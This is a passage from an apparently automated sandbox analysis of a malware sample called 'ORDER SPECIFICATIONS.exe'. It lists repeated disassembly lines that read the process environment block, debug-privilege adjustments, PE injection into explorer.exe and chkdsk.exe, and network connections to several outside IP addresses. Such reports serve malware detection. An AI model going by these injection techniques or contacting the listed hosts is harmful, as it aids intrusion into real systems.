Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05553D34 mov eax, dword ptr fs:[00000030h]	16_2_05553D34
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05553D34 mov eax, dword ptr fs:[00000030h]	16_2_05553D34
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05553D34 mov eax, dword ptr fs:[00000030h]	16_2_05553D34
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0554AD30 mov eax, dword ptr fs:[00000030h]	16_2_0554AD30
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_055CA537 mov eax, dword ptr fs:[00000030h]	16_2_055CA537
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05574D3B mov eax, dword ptr fs:[00000030h]	16_2_05574D3B
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05574D3B mov eax, dword ptr fs:[00000030h]	16_2_05574D3B
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05574D3B mov eax, dword ptr fs:[00000030h]	16_2_05574D3B
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0557513A mov eax, dword ptr fs:[00000030h]	16_2_0557513A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0557513A mov eax, dword ptr fs:[00000030h]	16_2_0557513A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05564120 mov eax, dword ptr fs:[00000030h]	16_2_05564120
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05564120 mov eax, dword ptr fs:[00000030h]	16_2_05564120
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05564120 mov eax, dword ptr fs:[00000030h]	16_2_05564120
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05564120 mov eax, dword ptr fs:[00000030h]	16_2_05564120
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05564120 mov ecx, dword ptr fs:[00000030h]	16_2_05564120
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_055F8DF1 mov eax, dword ptr fs:[00000030h]	16_2_055F8DF1
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0554B1E1 mov eax, dword ptr fs:[00000030h]	16_2_0554B1E1
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0554B1E1 mov eax, dword ptr fs:[00000030h]	16_2_0554B1E1
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0554B1E1 mov eax, dword ptr fs:[00000030h]	16_2_0554B1E1
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_055D41E8 mov eax, dword ptr fs:[00000030h]	16_2_055D41E8
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0555D5E0 mov eax, dword ptr fs:[00000030h]	16_2_0555D5E0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0555D5E0 mov eax, dword ptr fs:[00000030h]	16_2_0555D5E0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05572990 mov eax, dword ptr fs:[00000030h]	16_2_05572990
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0557FD9B mov eax, dword ptr fs:[00000030h]	16_2_0557FD9B
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0557FD9B mov eax, dword ptr fs:[00000030h]	16_2_0557FD9B
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0557A185 mov eax, dword ptr fs:[00000030h]	16_2_0557A185
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0556C182 mov eax, dword ptr fs:[00000030h]	16_2_0556C182
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05572581 mov eax, dword ptr fs:[00000030h]	16_2_05572581
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05572581 mov eax, dword ptr fs:[00000030h]	16_2_05572581
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05572581 mov eax, dword ptr fs:[00000030h]	16_2_05572581
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05572581 mov eax, dword ptr fs:[00000030h]	16_2_05572581
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05542D8A mov eax, dword ptr fs:[00000030h]	16_2_05542D8A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05542D8A mov eax, dword ptr fs:[00000030h]	16_2_05542D8A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05542D8A mov eax, dword ptr fs:[00000030h]	16_2_05542D8A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05542D8A mov eax, dword ptr fs:[00000030h]	16_2_05542D8A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05542D8A mov eax, dword ptr fs:[00000030h]	16_2_05542D8A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05571DB5 mov eax, dword ptr fs:[00000030h]	16_2_05571DB5
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05571DB5 mov eax, dword ptr fs:[00000030h]	16_2_05571DB5
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05571DB5 mov eax, dword ptr fs:[00000030h]	16_2_05571DB5
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_055C51BE mov eax, dword ptr fs:[00000030h]	16_2_055C51BE
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_055C51BE mov eax, dword ptr fs:[00000030h]	16_2_055C51BE
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_055C51BE mov eax, dword ptr fs:[00000030h]	16_2_055C51BE
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_055C51BE mov eax, dword ptr fs:[00000030h]	16_2_055C51BE
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_055735A1 mov eax, dword ptr fs:[00000030h]	16_2_055735A1
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_055761A0 mov eax, dword ptr fs:[00000030h]	16_2_055761A0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_055761A0 mov eax, dword ptr fs:[00000030h]	16_2_055761A0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_055C69A6 mov eax, dword ptr fs:[00000030h]	16_2_055C69A6
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05560050 mov eax, dword ptr fs:[00000030h]	16_2_05560050
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05560050 mov eax, dword ptr fs:[00000030h]	16_2_05560050
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_055DC450 mov eax, dword ptr fs:[00000030h]	16_2_055DC450
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_055DC450 mov eax, dword ptr fs:[00000030h]	16_2_055DC450
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05602073 mov eax, dword ptr fs:[00000030h]	16_2_05602073
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05611074 mov eax, dword ptr fs:[00000030h]	16_2_05611074
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0557A44B mov eax, dword ptr fs:[00000030h]	16_2_0557A44B
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0556746D mov eax, dword ptr fs:[00000030h]	16_2_0556746D
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_055C7016 mov eax, dword ptr fs:[00000030h]	16_2_055C7016
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_055C7016 mov eax, dword ptr fs:[00000030h]	16_2_055C7016
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_055C7016 mov eax, dword ptr fs:[00000030h]	16_2_055C7016
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_055C6C0A mov eax, dword ptr fs:[00000030h]	16_2_055C6C0A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_055C6C0A mov eax, dword ptr fs:[00000030h]	16_2_055C6C0A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_055C6C0A mov eax, dword ptr fs:[00000030h]	16_2_055C6C0A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_055C6C0A mov eax, dword ptr fs:[00000030h]	16_2_055C6C0A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05601C06 mov eax, dword ptr fs:[00000030h]	16_2_05601C06
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05601C06 mov eax, dword ptr fs:[00000030h]	16_2_05601C06
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05601C06 mov eax, dword ptr fs:[00000030h]	16_2_05601C06
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05601C06 mov eax, dword ptr fs:[00000030h]	16_2_05601C06
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05601C06 mov eax, dword ptr fs:[00000030h]	16_2_05601C06
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05601C06 mov eax, dword ptr fs:[00000030h]	16_2_05601C06
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05601C06 mov eax, dword ptr fs:[00000030h]	16_2_05601C06
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05601C06 mov eax, dword ptr fs:[00000030h]	16_2_05601C06
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05601C06 mov eax, dword ptr fs:[00000030h]	16_2_05601C06
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05601C06 mov eax, dword ptr fs:[00000030h]	16_2_05601C06
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05601C06 mov eax, dword ptr fs:[00000030h]	16_2_05601C06
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05601C06 mov eax, dword ptr fs:[00000030h]	16_2_05601C06
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05601C06 mov eax, dword ptr fs:[00000030h]	16_2_05601C06
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05601C06 mov eax, dword ptr fs:[00000030h]	16_2_05601C06
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0561740D mov eax, dword ptr fs:[00000030h]	16_2_0561740D
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0561740D mov eax, dword ptr fs:[00000030h]	16_2_0561740D
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0561740D mov eax, dword ptr fs:[00000030h]	16_2_0561740D
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05614015 mov eax, dword ptr fs:[00000030h]	16_2_05614015
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05614015 mov eax, dword ptr fs:[00000030h]	16_2_05614015
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0557002D mov eax, dword ptr fs:[00000030h]	16_2_0557002D
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0557002D mov eax, dword ptr fs:[00000030h]	16_2_0557002D
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0557002D mov eax, dword ptr fs:[00000030h]	16_2_0557002D
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0557002D mov eax, dword ptr fs:[00000030h]	16_2_0557002D
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0557002D mov eax, dword ptr fs:[00000030h]	16_2_0557002D
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0557BC2C mov eax, dword ptr fs:[00000030h]	16_2_0557BC2C
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0555B02A mov eax, dword ptr fs:[00000030h]	16_2_0555B02A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0555B02A mov eax, dword ptr fs:[00000030h]	16_2_0555B02A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0555B02A mov eax, dword ptr fs:[00000030h]	16_2_0555B02A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0555B02A mov eax, dword ptr fs:[00000030h]	16_2_0555B02A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_055DB8D0 mov eax, dword ptr fs:[00000030h]	16_2_055DB8D0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_055DB8D0 mov ecx, dword ptr fs:[00000030h]	16_2_055DB8D0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_055DB8D0 mov eax, dword ptr fs:[00000030h]	16_2_055DB8D0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_055DB8D0 mov eax, dword ptr fs:[00000030h]	16_2_055DB8D0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_055DB8D0 mov eax, dword ptr fs:[00000030h]	16_2_055DB8D0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_055DB8D0 mov eax, dword ptr fs:[00000030h]	16_2_055DB8D0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056014FB mov eax, dword ptr fs:[00000030h]	16_2_056014FB
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_055C6CF0 mov eax, dword ptr fs:[00000030h]	16_2_055C6CF0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_055C6CF0 mov eax, dword ptr fs:[00000030h]	16_2_055C6CF0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_055C6CF0 mov eax, dword ptr fs:[00000030h]	16_2_055C6CF0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05618CD6 mov eax, dword ptr fs:[00000030h]	16_2_05618CD6
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0555849B mov eax, dword ptr fs:[00000030h]	16_2_0555849B
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05549080 mov eax, dword ptr fs:[00000030h]	16_2_05549080
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_055C3884 mov eax, dword ptr fs:[00000030h]	16_2_055C3884
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_055C3884 mov eax, dword ptr fs:[00000030h]	16_2_055C3884
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0557F0BF mov ecx, dword ptr fs:[00000030h]	16_2_0557F0BF
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0557F0BF mov eax, dword ptr fs:[00000030h]	16_2_0557F0BF
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0557F0BF mov eax, dword ptr fs:[00000030h]	16_2_0557F0BF
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_055890AF mov eax, dword ptr fs:[00000030h]	16_2_055890AF
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05618F6A mov eax, dword ptr fs:[00000030h]	16_2_05618F6A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0554F358 mov eax, dword ptr fs:[00000030h]	16_2_0554F358
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0554DB40 mov eax, dword ptr fs:[00000030h]	16_2_0554DB40
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0555EF40 mov eax, dword ptr fs:[00000030h]	16_2_0555EF40
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05573B7A mov eax, dword ptr fs:[00000030h]	16_2_05573B7A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05573B7A mov eax, dword ptr fs:[00000030h]	16_2_05573B7A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0554DB60 mov ecx, dword ptr fs:[00000030h]	16_2_0554DB60
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0555FF60 mov eax, dword ptr fs:[00000030h]	16_2_0555FF60
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05618B58 mov eax, dword ptr fs:[00000030h]	16_2_05618B58
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0556F716 mov eax, dword ptr fs:[00000030h]	16_2_0556F716
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_055DFF10 mov eax, dword ptr fs:[00000030h]	16_2_055DFF10
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_055DFF10 mov eax, dword ptr fs:[00000030h]	16_2_055DFF10
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0557A70E mov eax, dword ptr fs:[00000030h]	16_2_0557A70E
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0557A70E mov eax, dword ptr fs:[00000030h]	16_2_0557A70E
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0557E730 mov eax, dword ptr fs:[00000030h]	16_2_0557E730
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0561070D mov eax, dword ptr fs:[00000030h]	16_2_0561070D
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0561070D mov eax, dword ptr fs:[00000030h]	16_2_0561070D
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05544F2E mov eax, dword ptr fs:[00000030h]	16_2_05544F2E
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05544F2E mov eax, dword ptr fs:[00000030h]	16_2_05544F2E
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0560131B mov eax, dword ptr fs:[00000030h]	16_2_0560131B
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_055C53CA mov eax, dword ptr fs:[00000030h]	16_2_055C53CA
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_055C53CA mov eax, dword ptr fs:[00000030h]	16_2_055C53CA
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_055837F5 mov eax, dword ptr fs:[00000030h]	16_2_055837F5
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_055703E2 mov eax, dword ptr fs:[00000030h]	16_2_055703E2
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_055703E2 mov eax, dword ptr fs:[00000030h]	16_2_055703E2
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_055703E2 mov eax, dword ptr fs:[00000030h]	16_2_055703E2
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_055703E2 mov eax, dword ptr fs:[00000030h]	16_2_055703E2
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_055703E2 mov eax, dword ptr fs:[00000030h]	16_2_055703E2
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_055703E2 mov eax, dword ptr fs:[00000030h]	16_2_055703E2
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05572397 mov eax, dword ptr fs:[00000030h]	16_2_05572397
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05558794 mov eax, dword ptr fs:[00000030h]	16_2_05558794
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05615BA5 mov eax, dword ptr fs:[00000030h]	16_2_05615BA5
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0557B390 mov eax, dword ptr fs:[00000030h]	16_2_0557B390
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_055C7794 mov eax, dword ptr fs:[00000030h]	16_2_055C7794
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_055C7794 mov eax, dword ptr fs:[00000030h]	16_2_055C7794
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_055C7794 mov eax, dword ptr fs:[00000030h]	16_2_055C7794
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05551B8F mov eax, dword ptr fs:[00000030h]	16_2_05551B8F
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05551B8F mov eax, dword ptr fs:[00000030h]	16_2_05551B8F
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_055FD380 mov ecx, dword ptr fs:[00000030h]	16_2_055FD380
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0560138A mov eax, dword ptr fs:[00000030h]	16_2_0560138A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05618A62 mov eax, dword ptr fs:[00000030h]	16_2_05618A62
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_055D4257 mov eax, dword ptr fs:[00000030h]	16_2_055D4257
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05549240 mov eax, dword ptr fs:[00000030h]	16_2_05549240
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05549240 mov eax, dword ptr fs:[00000030h]	16_2_05549240
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05549240 mov eax, dword ptr fs:[00000030h]	16_2_05549240
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05549240 mov eax, dword ptr fs:[00000030h]	16_2_05549240
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05557E41 mov eax, dword ptr fs:[00000030h]	16_2_05557E41
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05557E41 mov eax, dword ptr fs:[00000030h]	16_2_05557E41
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05557E41 mov eax, dword ptr fs:[00000030h]	16_2_05557E41
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05557E41 mov eax, dword ptr fs:[00000030h]	16_2_05557E41
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05557E41 mov eax, dword ptr fs:[00000030h]	16_2_05557E41
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05557E41 mov eax, dword ptr fs:[00000030h]	16_2_05557E41
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0558927A mov eax, dword ptr fs:[00000030h]	16_2_0558927A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0556AE73 mov eax, dword ptr fs:[00000030h]	16_2_0556AE73
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0556AE73 mov eax, dword ptr fs:[00000030h]	16_2_0556AE73
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0556AE73 mov eax, dword ptr fs:[00000030h]	16_2_0556AE73
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0556AE73 mov eax, dword ptr fs:[00000030h]	16_2_0556AE73
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0556AE73 mov eax, dword ptr fs:[00000030h]	16_2_0556AE73
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0555766D mov eax, dword ptr fs:[00000030h]	16_2_0555766D
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_055FB260 mov eax, dword ptr fs:[00000030h]	16_2_055FB260
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_055FB260 mov eax, dword ptr fs:[00000030h]	16_2_055FB260
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0554AA16 mov eax, dword ptr fs:[00000030h]	16_2_0554AA16
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0554AA16 mov eax, dword ptr fs:[00000030h]	16_2_0554AA16
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05563A1C mov eax, dword ptr fs:[00000030h]	16_2_05563A1C
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0557A61C mov eax, dword ptr fs:[00000030h]	16_2_0557A61C
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0557A61C mov eax, dword ptr fs:[00000030h]	16_2_0557A61C
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0554C600 mov eax, dword ptr fs:[00000030h]	16_2_0554C600
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0554C600 mov eax, dword ptr fs:[00000030h]	16_2_0554C600
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0554C600 mov eax, dword ptr fs:[00000030h]	16_2_0554C600
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05578E00 mov eax, dword ptr fs:[00000030h]	16_2_05578E00
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05558A0A mov eax, dword ptr fs:[00000030h]	16_2_05558A0A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_055FFE3F mov eax, dword ptr fs:[00000030h]	16_2_055FFE3F
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0554E620 mov eax, dword ptr fs:[00000030h]	16_2_0554E620
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_055736CC mov eax, dword ptr fs:[00000030h]	16_2_055736CC
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05572ACB mov eax, dword ptr fs:[00000030h]	16_2_05572ACB
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_055FFEC0 mov eax, dword ptr fs:[00000030h]	16_2_055FFEC0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05588EC7 mov eax, dword ptr fs:[00000030h]	16_2_05588EC7
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05572AE4 mov eax, dword ptr fs:[00000030h]	16_2_05572AE4
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_055716E0 mov ecx, dword ptr fs:[00000030h]	16_2_055716E0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05618ED6 mov eax, dword ptr fs:[00000030h]	16_2_05618ED6
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_055576E2 mov eax, dword ptr fs:[00000030h]	16_2_055576E2
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0557D294 mov eax, dword ptr fs:[00000030h]	16_2_0557D294
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0557D294 mov eax, dword ptr fs:[00000030h]	16_2_0557D294
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05610EA5 mov eax, dword ptr fs:[00000030h]	16_2_05610EA5
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05610EA5 mov eax, dword ptr fs:[00000030h]	16_2_05610EA5
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05610EA5 mov eax, dword ptr fs:[00000030h]	16_2_05610EA5
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_055DFE87 mov eax, dword ptr fs:[00000030h]	16_2_055DFE87
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0555AAB0 mov eax, dword ptr fs:[00000030h]	16_2_0555AAB0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0555AAB0 mov eax, dword ptr fs:[00000030h]	16_2_0555AAB0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0557FAB0 mov eax, dword ptr fs:[00000030h]	16_2_0557FAB0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_055452A5 mov eax, dword ptr fs:[00000030h]	16_2_055452A5
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_055452A5 mov eax, dword ptr fs:[00000030h]	16_2_055452A5

Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Network Connect: 170.106.171.56 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 54.85.86.211 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 13.57.130.120 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.90.54.238 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 50.87.196.120 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 156.240.32.114 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 154.91.61.105 80	Jump to behavior

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe

Memory written: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe base: 400000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Section loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write	Jump to behavior
